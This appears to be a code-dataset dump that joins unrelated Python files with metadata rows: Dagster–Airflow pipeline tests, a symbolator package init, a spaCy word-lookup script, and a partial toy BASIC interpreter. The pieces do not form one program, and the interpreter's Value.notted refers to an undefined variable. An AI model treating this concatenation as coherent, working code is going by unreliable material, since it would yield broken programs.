pipeline_name = 'demo_pipeline'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_s3.yaml'),
]
run_id = str(uuid.uuid4())
image = IMAGE
def test_execute_dag_kubernetized(self, dagster_airflow_k8s_operator_pipeline):
validate_pipeline_execution(dagster_airflow_k8s_operator_pipeline)
class TestExecuteDagKubernetizedGCSStorage(object):
pipeline_name = 'demo_pipeline_gcs'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_gcs.yaml'),
]
run_id = str(uuid.uuid4())
image = IMAGE
def test_execute_dag_kubernetized(self, dagster_airflow_k8s_operator_pipeline):
validate_pipeline_execution(dagster_airflow_k8s_operator_pipeline)
def test_rename_for_airflow():
pairs = [
('foo', 'foo'),
('this-is-valid', 'this-is-valid'),
(
'a' * AIRFLOW_MAX_DAG_NAME_LEN + 'very long strings are disallowed',
'a' * AIRFLOW_MAX_DAG_NAME_LEN,
),
('a name with illegal spaces', 'a_name_with_illegal_spaces'),
('a#name$with@special*chars!!!', 'a_name_with_special_chars___'),
]
for before, after in pairs:
assert after == _rename_for_airflow(before)
def validate_skip_pipeline_execution(result):
expected_airflow_task_states = {
('foo', False),
('first_consumer', False),
('second_consumer', True),
('third_consumer', True),
}
seen = {(ti.task_id, isinstance(value, AirflowSkipException)) for ti, value in result.items()}
assert seen == expected_airflow_task_states
class TestExecuteSkipsPythonOperator(object):
pipeline_name = 'optional_outputs'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [os.path.join(ENVIRONMENTS_PATH, 'env_filesystem.yaml')]
run_id = str(uuid.uuid4())
def test_execute_dag(self, dagster_airflow_python_operator_pipeline):
validate_skip_pipeline_execution(dagster_airflow_python_operator_pipeline)
class TestExecuteSkipsContainerized(object):
pipeline_name = 'optional_outputs'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [os.path.join(ENVIRONMENTS_PATH, 'env_filesystem.yaml')]
run_id = str(uuid.uuid4())
op_kwargs = {'host_tmp_dir': '/tmp'}
image = IMAGE
def test_execute_dag_containerized(self, dagster_airflow_docker_operator_pipeline):
validate_skip_pipeline_execution(dagster_airflow_docker_operator_pipeline)
| true
| true
|
f70b7c4882be3566aec8efefe1b2fcf666fad2ae
| 83
|
py
|
Python
|
symbolator/corpus/__init__.py
|
buildsi/symbolator
|
4af830082d994d5a6d899189ac8e6dd236332ac9
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 2
|
2021-11-09T09:14:27.000Z
|
2021-11-09T17:16:56.000Z
|
symbolator/corpus/__init__.py
|
buildsi/symbolator
|
4af830082d994d5a6d899189ac8e6dd236332ac9
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 2
|
2021-06-19T17:19:12.000Z
|
2021-10-31T19:51:50.000Z
|
symbolator/corpus/__init__.py
|
buildsi/symbolator
|
4af830082d994d5a6d899189ac8e6dd236332ac9
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null |
from .elf import Corpus
from .base import CorpusBase, JsonCorpus, JsonCorpusLoader
| 27.666667
| 58
| 0.831325
|
from .elf import Corpus
from .base import CorpusBase, JsonCorpus, JsonCorpusLoader
| true
| true
|
f70b7d0d3c8ecc6b25400f485bf3ddd85c3790e5
| 759
|
py
|
Python
|
Demos/Distancias_ocurrencias.py
|
TheReverseWasp/TBD_TF-IDF_with_Google_Corpus
|
92e60148f625cf0be0300b60e3e09b553f96b7df
|
[
"MIT"
] | null | null | null |
Demos/Distancias_ocurrencias.py
|
TheReverseWasp/TBD_TF-IDF_with_Google_Corpus
|
92e60148f625cf0be0300b60e3e09b553f96b7df
|
[
"MIT"
] | null | null | null |
Demos/Distancias_ocurrencias.py
|
TheReverseWasp/TBD_TF-IDF_with_Google_Corpus
|
92e60148f625cf0be0300b60e3e09b553f96b7df
|
[
"MIT"
] | null | null | null |
import json
import re
import spacy
import enchant
import copy as cp
sp = spacy.load('en_core_web_sm')
def lemmatize_this(str_word):
return sp(str_word)[0]
def main():
while True:
print("Ingrese la Palabra: ")
word = input()
word = str(lemmatize_this(word))
try:
with open("../Datos/06_words_fixed/stg0/" + word + ".json", "r") as answerJson:
wordDic = json.load(answerJson)
elems = [[k, v] for k, v in wordDic.items()]
elems.sort(key = lambda x: x[1])
rank = len(elems)
for i in elems:
print(rank, i)
rank -=1
except:
print("Palabra no encontrada")
if __name__ == "__main__":
main()
| 24.483871
| 91
| 0.541502
|
import json
import re
import spacy
import enchant
import copy as cp
sp = spacy.load('en_core_web_sm')
def lemmatize_this(str_word):
return sp(str_word)[0]
def main():
while True:
print("Ingrese la Palabra: ")
word = input()
word = str(lemmatize_this(word))
try:
with open("../Datos/06_words_fixed/stg0/" + word + ".json", "r") as answerJson:
wordDic = json.load(answerJson)
elems = [[k, v] for k, v in wordDic.items()]
elems.sort(key = lambda x: x[1])
rank = len(elems)
for i in elems:
print(rank, i)
rank -=1
except:
print("Palabra no encontrada")
if __name__ == "__main__":
main()
| true
| true
|
f70b7fd4259e0ee06d7ecf1c652c7a551b8fef2a
| 37,041
|
py
|
Python
|
ep8/basic.py
|
Eli-pixel/py-myopl-code
|
babfbdec2b9bcb057ccc38424d81efaaf8b719b6
|
[
"MIT"
] | 325
|
2019-05-16T17:48:57.000Z
|
2022-03-31T05:57:49.000Z
|
ep8/basic.py
|
Eli-pixel/py-myopl-code
|
babfbdec2b9bcb057ccc38424d81efaaf8b719b6
|
[
"MIT"
] | 18
|
2020-03-11T22:03:12.000Z
|
2022-03-07T20:23:09.000Z
|
ep8/basic.py
|
Eli-pixel/py-myopl-code
|
babfbdec2b9bcb057ccc38424d81efaaf8b719b6
|
[
"MIT"
] | 359
|
2019-05-16T17:49:06.000Z
|
2022-03-31T09:57:46.000Z
|
#######################################
# IMPORTS
#######################################
from strings_with_arrows import *
import string
#######################################
# CONSTANTS
#######################################
DIGITS = '0123456789'
LETTERS = string.ascii_letters
LETTERS_DIGITS = LETTERS + DIGITS
#######################################
# ERRORS
#######################################
class Error:
def __init__(self, pos_start, pos_end, error_name, details):
self.pos_start = pos_start
self.pos_end = pos_end
self.error_name = error_name
self.details = details
def as_string(self):
result = f'{self.error_name}: {self.details}\n'
result += f'File {self.pos_start.fn}, line {self.pos_start.ln + 1}'
result += '\n\n' + string_with_arrows(self.pos_start.ftxt, self.pos_start, self.pos_end)
return result
class IllegalCharError(Error):
def __init__(self, pos_start, pos_end, details):
super().__init__(pos_start, pos_end, 'Illegal Character', details)
class ExpectedCharError(Error):
def __init__(self, pos_start, pos_end, details):
super().__init__(pos_start, pos_end, 'Expected Character', details)
class InvalidSyntaxError(Error):
def __init__(self, pos_start, pos_end, details=''):
super().__init__(pos_start, pos_end, 'Invalid Syntax', details)
class RTError(Error):
def __init__(self, pos_start, pos_end, details, context):
super().__init__(pos_start, pos_end, 'Runtime Error', details)
self.context = context
def as_string(self):
result = self.generate_traceback()
result += f'{self.error_name}: {self.details}'
result += '\n\n' + string_with_arrows(self.pos_start.ftxt, self.pos_start, self.pos_end)
return result
def generate_traceback(self):
result = ''
pos = self.pos_start
ctx = self.context
while ctx:
result = f' File {pos.fn}, line {str(pos.ln + 1)}, in {ctx.display_name}\n' + result
pos = ctx.parent_entry_pos
ctx = ctx.parent
return 'Traceback (most recent call last):\n' + result
#######################################
# POSITION
#######################################
class Position:
def __init__(self, idx, ln, col, fn, ftxt):
self.idx = idx
self.ln = ln
self.col = col
self.fn = fn
self.ftxt = ftxt
def advance(self, current_char=None):
self.idx += 1
self.col += 1
if current_char == '\n':
self.ln += 1
self.col = 0
return self
def copy(self):
return Position(self.idx, self.ln, self.col, self.fn, self.ftxt)
#######################################
# TOKENS
#######################################
TT_INT = 'INT'
TT_FLOAT = 'FLOAT'
TT_IDENTIFIER = 'IDENTIFIER'
TT_KEYWORD = 'KEYWORD'
TT_PLUS = 'PLUS'
TT_MINUS = 'MINUS'
TT_MUL = 'MUL'
TT_DIV = 'DIV'
TT_POW = 'POW'
TT_EQ = 'EQ'
TT_LPAREN = 'LPAREN'
TT_RPAREN = 'RPAREN'
TT_EE = 'EE'
TT_NE = 'NE'
TT_LT = 'LT'
TT_GT = 'GT'
TT_LTE = 'LTE'
TT_GTE = 'GTE'
TT_COMMA = 'COMMA'
TT_ARROW = 'ARROW'
TT_EOF = 'EOF'
KEYWORDS = [
'VAR',
'AND',
'OR',
'NOT',
'IF',
'ELIF',
'ELSE',
'FOR',
'TO',
'STEP',
'WHILE',
'FUN',
'THEN'
]
class Token:
def __init__(self, type_, value=None, pos_start=None, pos_end=None):
self.type = type_
self.value = value
if pos_start:
self.pos_start = pos_start.copy()
self.pos_end = pos_start.copy()
self.pos_end.advance()
if pos_end:
self.pos_end = pos_end.copy()
def matches(self, type_, value):
return self.type == type_ and self.value == value
def __repr__(self):
if self.value: return f'{self.type}:{self.value}'
return f'{self.type}'
#######################################
# LEXER
#######################################
class Lexer:
def __init__(self, fn, text):
self.fn = fn
self.text = text
self.pos = Position(-1, 0, -1, fn, text)
self.current_char = None
self.advance()
def advance(self):
self.pos.advance(self.current_char)
self.current_char = self.text[self.pos.idx] if self.pos.idx < len(self.text) else None
def make_tokens(self):
tokens = []
while self.current_char != None:
if self.current_char in ' \t':
self.advance()
elif self.current_char in DIGITS:
tokens.append(self.make_number())
elif self.current_char in LETTERS:
tokens.append(self.make_identifier())
elif self.current_char == '+':
tokens.append(Token(TT_PLUS, pos_start=self.pos))
self.advance()
elif self.current_char == '-':
tokens.append(self.make_minus_or_arrow())
elif self.current_char == '*':
tokens.append(Token(TT_MUL, pos_start=self.pos))
self.advance()
elif self.current_char == '/':
tokens.append(Token(TT_DIV, pos_start=self.pos))
self.advance()
elif self.current_char == '^':
tokens.append(Token(TT_POW, pos_start=self.pos))
self.advance()
elif self.current_char == '(':
tokens.append(Token(TT_LPAREN, pos_start=self.pos))
self.advance()
elif self.current_char == ')':
tokens.append(Token(TT_RPAREN, pos_start=self.pos))
self.advance()
elif self.current_char == '!':
token, error = self.make_not_equals()
if error: return [], error
tokens.append(token)
elif self.current_char == '=':
tokens.append(self.make_equals())
elif self.current_char == '<':
tokens.append(self.make_less_than())
elif self.current_char == '>':
tokens.append(self.make_greater_than())
elif self.current_char == ',':
tokens.append(Token(TT_COMMA, pos_start=self.pos))
self.advance()
else:
pos_start = self.pos.copy()
char = self.current_char
self.advance()
return [], IllegalCharError(pos_start, self.pos, "'" + char + "'")
tokens.append(Token(TT_EOF, pos_start=self.pos))
return tokens, None
def make_number(self):
num_str = ''
dot_count = 0
pos_start = self.pos.copy()
while self.current_char != None and self.current_char in DIGITS + '.':
if self.current_char == '.':
if dot_count == 1: break
dot_count += 1
num_str += self.current_char
self.advance()
if dot_count == 0:
return Token(TT_INT, int(num_str), pos_start, self.pos)
else:
return Token(TT_FLOAT, float(num_str), pos_start, self.pos)
def make_identifier(self):
id_str = ''
pos_start = self.pos.copy()
while self.current_char != None and self.current_char in LETTERS_DIGITS + '_':
id_str += self.current_char
self.advance()
tok_type = TT_KEYWORD if id_str in KEYWORDS else TT_IDENTIFIER
return Token(tok_type, id_str, pos_start, self.pos)
def make_minus_or_arrow(self):
tok_type = TT_MINUS
pos_start = self.pos.copy()
self.advance()
if self.current_char == '>':
self.advance()
tok_type = TT_ARROW
return Token(tok_type, pos_start=pos_start, pos_end=self.pos)
def make_not_equals(self):
pos_start = self.pos.copy()
self.advance()
if self.current_char == '=':
self.advance()
return Token(TT_NE, pos_start=pos_start, pos_end=self.pos), None
self.advance()
return None, ExpectedCharError(pos_start, self.pos, "'=' (after '!')")
def make_equals(self):
tok_type = TT_EQ
pos_start = self.pos.copy()
self.advance()
if self.current_char == '=':
self.advance()
tok_type = TT_EE
return Token(tok_type, pos_start=pos_start, pos_end=self.pos)
def make_less_than(self):
tok_type = TT_LT
pos_start = self.pos.copy()
self.advance()
if self.current_char == '=':
self.advance()
tok_type = TT_LTE
return Token(tok_type, pos_start=pos_start, pos_end=self.pos)
def make_greater_than(self):
tok_type = TT_GT
pos_start = self.pos.copy()
self.advance()
if self.current_char == '=':
self.advance()
tok_type = TT_GTE
return Token(tok_type, pos_start=pos_start, pos_end=self.pos)
#######################################
# NODES
#######################################
class NumberNode:
def __init__(self, tok):
self.tok = tok
self.pos_start = self.tok.pos_start
self.pos_end = self.tok.pos_end
def __repr__(self):
return f'{self.tok}'
class VarAccessNode:
def __init__(self, var_name_tok):
self.var_name_tok = var_name_tok
self.pos_start = self.var_name_tok.pos_start
self.pos_end = self.var_name_tok.pos_end
class VarAssignNode:
def __init__(self, var_name_tok, value_node):
self.var_name_tok = var_name_tok
self.value_node = value_node
self.pos_start = self.var_name_tok.pos_start
self.pos_end = self.value_node.pos_end
class BinOpNode:
def __init__(self, left_node, op_tok, right_node):
self.left_node = left_node
self.op_tok = op_tok
self.right_node = right_node
self.pos_start = self.left_node.pos_start
self.pos_end = self.right_node.pos_end
def __repr__(self):
return f'({self.left_node}, {self.op_tok}, {self.right_node})'
class UnaryOpNode:
def __init__(self, op_tok, node):
self.op_tok = op_tok
self.node = node
self.pos_start = self.op_tok.pos_start
self.pos_end = node.pos_end
def __repr__(self):
return f'({self.op_tok}, {self.node})'
class IfNode:
def __init__(self, cases, else_case):
self.cases = cases
self.else_case = else_case
self.pos_start = self.cases[0][0].pos_start
self.pos_end = (self.else_case or self.cases[len(self.cases) - 1][0]).pos_end
class ForNode:
def __init__(self, var_name_tok, start_value_node, end_value_node, step_value_node, body_node):
self.var_name_tok = var_name_tok
self.start_value_node = start_value_node
self.end_value_node = end_value_node
self.step_value_node = step_value_node
self.body_node = body_node
self.pos_start = self.var_name_tok.pos_start
self.pos_end = self.body_node.pos_end
class WhileNode:
def __init__(self, condition_node, body_node):
self.condition_node = condition_node
self.body_node = body_node
self.pos_start = self.condition_node.pos_start
self.pos_end = self.body_node.pos_end
class FuncDefNode:
def __init__(self, var_name_tok, arg_name_toks, body_node):
self.var_name_tok = var_name_tok
self.arg_name_toks = arg_name_toks
self.body_node = body_node
if self.var_name_tok:
self.pos_start = self.var_name_tok.pos_start
elif len(self.arg_name_toks) > 0:
self.pos_start = self.arg_name_toks[0].pos_start
else:
self.pos_start = self.body_node.pos_start
self.pos_end = self.body_node.pos_end
class CallNode:
def __init__(self, node_to_call, arg_nodes):
self.node_to_call = node_to_call
self.arg_nodes = arg_nodes
self.pos_start = self.node_to_call.pos_start
if len(self.arg_nodes) > 0:
self.pos_end = self.arg_nodes[len(self.arg_nodes) - 1].pos_end
else:
self.pos_end = self.node_to_call.pos_end
#######################################
# PARSE RESULT
#######################################
class ParseResult:
def __init__(self):
self.error = None
self.node = None
self.last_registered_advance_count = 0
self.advance_count = 0
def register_advancement(self):
self.last_registered_advance_count = 1
self.advance_count += 1
def register(self, res):
self.last_registered_advance_count = res.advance_count
self.advance_count += res.advance_count
if res.error: self.error = res.error
return res.node
def success(self, node):
self.node = node
return self
def failure(self, error):
if not self.error or self.last_registered_advance_count == 0:
self.error = error
return self
#######################################
# PARSER
#######################################
class Parser:
def __init__(self, tokens):
self.tokens = tokens
self.tok_idx = -1
self.advance()
def advance(self, ):
self.tok_idx += 1
if self.tok_idx < len(self.tokens):
self.current_tok = self.tokens[self.tok_idx]
return self.current_tok
def parse(self):
res = self.expr()
if not res.error and self.current_tok.type != TT_EOF:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
"Expected '+', '-', '*', '/', '^', '==', '!=', '<', '>', <=', '>=', 'AND' or 'OR'"
))
return res
###################################
def expr(self):
res = ParseResult()
if self.current_tok.matches(TT_KEYWORD, 'VAR'):
res.register_advancement()
self.advance()
if self.current_tok.type != TT_IDENTIFIER:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
"Expected identifier"
))
var_name = self.current_tok
res.register_advancement()
self.advance()
if self.current_tok.type != TT_EQ:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
"Expected '='"
))
res.register_advancement()
self.advance()
expr = res.register(self.expr())
if res.error: return res
return res.success(VarAssignNode(var_name, expr))
node = res.register(self.bin_op(self.comp_expr, ((TT_KEYWORD, 'AND'), (TT_KEYWORD, 'OR'))))
if res.error:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
"Expected 'VAR', 'IF', 'FOR', 'WHILE', 'FUN', int, float, identifier, '+', '-', '(' or 'NOT'"
))
return res.success(node)
def comp_expr(self):
res = ParseResult()
if self.current_tok.matches(TT_KEYWORD, 'NOT'):
op_tok = self.current_tok
res.register_advancement()
self.advance()
node = res.register(self.comp_expr())
if res.error: return res
return res.success(UnaryOpNode(op_tok, node))
node = res.register(self.bin_op(self.arith_expr, (TT_EE, TT_NE, TT_LT, TT_GT, TT_LTE, TT_GTE)))
if res.error:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
"Expected int, float, identifier, '+', '-', '(' or 'NOT'"
))
return res.success(node)
def arith_expr(self):
return self.bin_op(self.term, (TT_PLUS, TT_MINUS))
def term(self):
return self.bin_op(self.factor, (TT_MUL, TT_DIV))
def factor(self):
res = ParseResult()
tok = self.current_tok
if tok.type in (TT_PLUS, TT_MINUS):
res.register_advancement()
self.advance()
factor = res.register(self.factor())
if res.error: return res
return res.success(UnaryOpNode(tok, factor))
return self.power()
def power(self):
return self.bin_op(self.call, (TT_POW, ), self.factor)
def call(self):
res = ParseResult()
atom = res.register(self.atom())
if res.error: return res
if self.current_tok.type == TT_LPAREN:
res.register_advancement()
self.advance()
arg_nodes = []
if self.current_tok.type == TT_RPAREN:
res.register_advancement()
self.advance()
else:
arg_nodes.append(res.register(self.expr()))
if res.error:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
"Expected ')', 'VAR', 'IF', 'FOR', 'WHILE', 'FUN', int, float, identifier, '+', '-', '(' or 'NOT'"
))
while self.current_tok.type == TT_COMMA:
res.register_advancement()
self.advance()
arg_nodes.append(res.register(self.expr()))
if res.error: return res
if self.current_tok.type != TT_RPAREN:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected ',' or ')'"
))
res.register_advancement()
self.advance()
return res.success(CallNode(atom, arg_nodes))
return res.success(atom)
def atom(self):
res = ParseResult()
tok = self.current_tok
if tok.type in (TT_INT, TT_FLOAT):
res.register_advancement()
self.advance()
return res.success(NumberNode(tok))
elif tok.type == TT_IDENTIFIER:
res.register_advancement()
self.advance()
return res.success(VarAccessNode(tok))
elif tok.type == TT_LPAREN:
res.register_advancement()
self.advance()
expr = res.register(self.expr())
if res.error: return res
if self.current_tok.type == TT_RPAREN:
res.register_advancement()
self.advance()
return res.success(expr)
else:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
"Expected ')'"
))
elif tok.matches(TT_KEYWORD, 'IF'):
if_expr = res.register(self.if_expr())
if res.error: return res
return res.success(if_expr)
elif tok.matches(TT_KEYWORD, 'FOR'):
for_expr = res.register(self.for_expr())
if res.error: return res
return res.success(for_expr)
elif tok.matches(TT_KEYWORD, 'WHILE'):
while_expr = res.register(self.while_expr())
if res.error: return res
return res.success(while_expr)
elif tok.matches(TT_KEYWORD, 'FUN'):
func_def = res.register(self.func_def())
if res.error: return res
return res.success(func_def)
return res.failure(InvalidSyntaxError(
tok.pos_start, tok.pos_end,
"Expected int, float, identifier, '+', '-', '(', 'IF', 'FOR', 'WHILE', 'FUN'"
))
def if_expr(self):
res = ParseResult()
cases = []
else_case = None
if not self.current_tok.matches(TT_KEYWORD, 'IF'):
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected 'IF'"
))
res.register_advancement()
self.advance()
condition = res.register(self.expr())
if res.error: return res
if not self.current_tok.matches(TT_KEYWORD, 'THEN'):
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected 'THEN'"
))
res.register_advancement()
self.advance()
expr = res.register(self.expr())
if res.error: return res
cases.append((condition, expr))
while self.current_tok.matches(TT_KEYWORD, 'ELIF'):
res.register_advancement()
self.advance()
condition = res.register(self.expr())
if res.error: return res
if not self.current_tok.matches(TT_KEYWORD, 'THEN'):
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected 'THEN'"
))
res.register_advancement()
self.advance()
expr = res.register(self.expr())
if res.error: return res
cases.append((condition, expr))
if self.current_tok.matches(TT_KEYWORD, 'ELSE'):
res.register_advancement()
self.advance()
else_case = res.register(self.expr())
if res.error: return res
return res.success(IfNode(cases, else_case))
def for_expr(self):
res = ParseResult()
if not self.current_tok.matches(TT_KEYWORD, 'FOR'):
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected 'FOR'"
))
res.register_advancement()
self.advance()
if self.current_tok.type != TT_IDENTIFIER:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected identifier"
))
var_name = self.current_tok
res.register_advancement()
self.advance()
if self.current_tok.type != TT_EQ:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected '='"
))
res.register_advancement()
self.advance()
start_value = res.register(self.expr())
if res.error: return res
if not self.current_tok.matches(TT_KEYWORD, 'TO'):
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected 'TO'"
))
res.register_advancement()
self.advance()
end_value = res.register(self.expr())
if res.error: return res
if self.current_tok.matches(TT_KEYWORD, 'STEP'):
res.register_advancement()
self.advance()
step_value = res.register(self.expr())
if res.error: return res
else:
step_value = None
if not self.current_tok.matches(TT_KEYWORD, 'THEN'):
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected 'THEN'"
))
res.register_advancement()
self.advance()
body = res.register(self.expr())
if res.error: return res
return res.success(ForNode(var_name, start_value, end_value, step_value, body))
def while_expr(self):
res = ParseResult()
if not self.current_tok.matches(TT_KEYWORD, 'WHILE'):
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected 'WHILE'"
))
res.register_advancement()
self.advance()
condition = res.register(self.expr())
if res.error: return res
if not self.current_tok.matches(TT_KEYWORD, 'THEN'):
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected 'THEN'"
))
res.register_advancement()
self.advance()
body = res.register(self.expr())
if res.error: return res
return res.success(WhileNode(condition, body))
def func_def(self):
res = ParseResult()
if not self.current_tok.matches(TT_KEYWORD, 'FUN'):
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected 'FUN'"
))
res.register_advancement()
self.advance()
if self.current_tok.type == TT_IDENTIFIER:
var_name_tok = self.current_tok
res.register_advancement()
self.advance()
if self.current_tok.type != TT_LPAREN:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected '('"
))
else:
var_name_tok = None
if self.current_tok.type != TT_LPAREN:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected identifier or '('"
))
res.register_advancement()
self.advance()
arg_name_toks = []
if self.current_tok.type == TT_IDENTIFIER:
arg_name_toks.append(self.current_tok)
res.register_advancement()
self.advance()
while self.current_tok.type == TT_COMMA:
res.register_advancement()
self.advance()
if self.current_tok.type != TT_IDENTIFIER:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected identifier"
))
arg_name_toks.append(self.current_tok)
res.register_advancement()
self.advance()
if self.current_tok.type != TT_RPAREN:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected ',' or ')'"
))
else:
if self.current_tok.type != TT_RPAREN:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected identifier or ')'"
))
res.register_advancement()
self.advance()
if self.current_tok.type != TT_ARROW:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected '->'"
))
res.register_advancement()
self.advance()
node_to_return = res.register(self.expr())
if res.error: return res
return res.success(FuncDefNode(
var_name_tok,
arg_name_toks,
node_to_return
))
###################################
def bin_op(self, func_a, ops, func_b=None):
if func_b == None:
func_b = func_a
res = ParseResult()
left = res.register(func_a())
if res.error: return res
while self.current_tok.type in ops or (self.current_tok.type, self.current_tok.value) in ops:
op_tok = self.current_tok
res.register_advancement()
self.advance()
right = res.register(func_b())
if res.error: return res
left = BinOpNode(left, op_tok, right)
return res.success(left)
#######################################
# RUNTIME RESULT
#######################################
class RTResult:
def __init__(self):
self.value = None
self.error = None
def register(self, res):
self.error = res.error
return res.value
def success(self, value):
self.value = value
return self
def failure(self, error):
self.error = error
return self
#######################################
# VALUES
#######################################
class Value:
def __init__(self):
self.set_pos()
self.set_context()
def set_pos(self, pos_start=None, pos_end=None):
self.pos_start = pos_start
self.pos_end = pos_end
return self
def set_context(self, context=None):
self.context = context
return self
def added_to(self, other):
return None, self.illegal_operation(other)
def subbed_by(self, other):
return None, self.illegal_operation(other)
def multed_by(self, other):
return None, self.illegal_operation(other)
def dived_by(self, other):
return None, self.illegal_operation(other)
def powed_by(self, other):
return None, self.illegal_operation(other)
def get_comparison_eq(self, other):
return None, self.illegal_operation(other)
def get_comparison_ne(self, other):
return None, self.illegal_operation(other)
def get_comparison_lt(self, other):
return None, self.illegal_operation(other)
def get_comparison_gt(self, other):
return None, self.illegal_operation(other)
def get_comparison_lte(self, other):
return None, self.illegal_operation(other)
def get_comparison_gte(self, other):
return None, self.illegal_operation(other)
def anded_by(self, other):
return None, self.illegal_operation(other)
def ored_by(self, other):
return None, self.illegal_operation(other)
def notted(self):
return None, self.illegal_operation(other)
def execute(self, args):
return RTResult().failure(self.illegal_operation())
def copy(self):
raise Exception('No copy method defined')
def is_true(self):
return False
def illegal_operation(self, other=None):
if not other: other = self
return RTError(
self.pos_start, other.pos_end,
'Illegal operation',
self.context
)
class Number(Value):
def __init__(self, value):
super().__init__()
self.value = value
def added_to(self, other):
if isinstance(other, Number):
return Number(self.value + other.value).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def subbed_by(self, other):
if isinstance(other, Number):
return Number(self.value - other.value).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def multed_by(self, other):
if isinstance(other, Number):
return Number(self.value * other.value).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def dived_by(self, other):
if isinstance(other, Number):
if other.value == 0:
return None, RTError(
other.pos_start, other.pos_end,
'Division by zero',
self.context
)
return Number(self.value / other.value).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def powed_by(self, other):
if isinstance(other, Number):
return Number(self.value ** other.value).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def get_comparison_eq(self, other):
if isinstance(other, Number):
return Number(int(self.value == other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def get_comparison_ne(self, other):
if isinstance(other, Number):
return Number(int(self.value != other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def get_comparison_lt(self, other):
if isinstance(other, Number):
return Number(int(self.value < other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def get_comparison_gt(self, other):
if isinstance(other, Number):
return Number(int(self.value > other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def get_comparison_lte(self, other):
if isinstance(other, Number):
return Number(int(self.value <= other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def get_comparison_gte(self, other):
if isinstance(other, Number):
return Number(int(self.value >= other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def anded_by(self, other):
if isinstance(other, Number):
return Number(int(self.value and other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def ored_by(self, other):
if isinstance(other, Number):
return Number(int(self.value or other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def notted(self):
return Number(1 if self.value == 0 else 0).set_context(self.context), None
def copy(self):
copy = Number(self.value)
copy.set_pos(self.pos_start, self.pos_end)
copy.set_context(self.context)
return copy
def is_true(self):
return self.value != 0
def __repr__(self):
return str(self.value)
class Function(Value):
def __init__(self, name, body_node, arg_names):
super().__init__()
self.name = name or "<anonymous>"
self.body_node = body_node
self.arg_names = arg_names
def execute(self, args):
res = RTResult()
interpreter = Interpreter()
new_context = Context(self.name, self.context, self.pos_start)
new_context.symbol_table = SymbolTable(new_context.parent.symbol_table)
if len(args) > len(self.arg_names):
return res.failure(RTError(
self.pos_start, self.pos_end,
f"{len(args) - len(self.arg_names)} too many args passed into '{self.name}'",
self.context
))
if len(args) < len(self.arg_names):
return res.failure(RTError(
self.pos_start, self.pos_end,
f"{len(self.arg_names) - len(args)} too few args passed into '{self.name}'",
self.context
))
for i in range(len(args)):
arg_name = self.arg_names[i]
arg_value = args[i]
arg_value.set_context(new_context)
new_context.symbol_table.set(arg_name, arg_value)
value = res.register(interpreter.visit(self.body_node, new_context))
if res.error: return res
return res.success(value)
def copy(self):
copy = Function(self.name, self.body_node, self.arg_names)
copy.set_context(self.context)
copy.set_pos(self.pos_start, self.pos_end)
return copy
def __repr__(self):
return f"<function {self.name}>"
#######################################
